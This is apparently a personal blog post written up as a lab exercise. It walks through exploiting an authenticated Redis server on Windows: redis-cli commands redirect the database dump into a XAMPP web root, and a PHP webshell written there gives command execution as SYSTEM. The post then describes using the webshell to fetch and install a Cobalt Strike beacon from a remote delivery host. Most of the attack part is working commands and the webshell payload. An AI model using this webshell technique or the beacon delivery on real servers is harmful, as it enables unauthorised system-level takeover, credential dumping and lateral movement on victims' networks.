Just had a fun with my testing lab related to Redis server. This morning after woke up a bit early, I started my Kali linux machine and thinking about excercising my pentest technical skill. I found one lab related to Redis server which is quite intersting.
I would like to share on post exploitation based on the access that we have on Redis server. So I assume that you alread had the access as administrator on the Redis server and able to connect via remotely
First you need to connect to the server using the redish-cli and specify the IP address
redish-cli -h 10.129.218.54
The next is to do the authentication so that you can have execute redis command on the server
auth [PUT YOUR PASSWORD HERE]
Once the authentication is done then the next is to set redis configuration path. This is where we put our exploit which will help us on the RCE
config set dir C:\xampp\htdocs\
Lets setup the backdoor file php file
config set dbfilename grem.php
Since my redis server is also hosting a web application based on the PHP then we create a webshell called grem.php
The next phase is to set the content of the php backdoor file
set grem "<?php system($_REQUEST['me']); ?>"
Setup the foot hold
As we have successfully created the backdoor so we can start the RCE. Lets test the backdoor with command whoami
Based on the result returned by the webshell, It looks like the backdoor is perfecly working and we can see that the webserver is running as NT AUTHORITY/SYSTEM.
I use cobaltstrike to navigate further activities such as hash dumping or lateral movement. With the capability that we have above then we can deliver our beacon.
I use the Scripted web delivery to install my beacon on the compromised host with the above configuration. Cobaltstrike will generate the oneliner that you can execute on the host or via our RCE
Next is to run the powershell comand on the WebShell that we created before
After waiting less than 5 seconds then we can see that a new beacon with highest privilege is established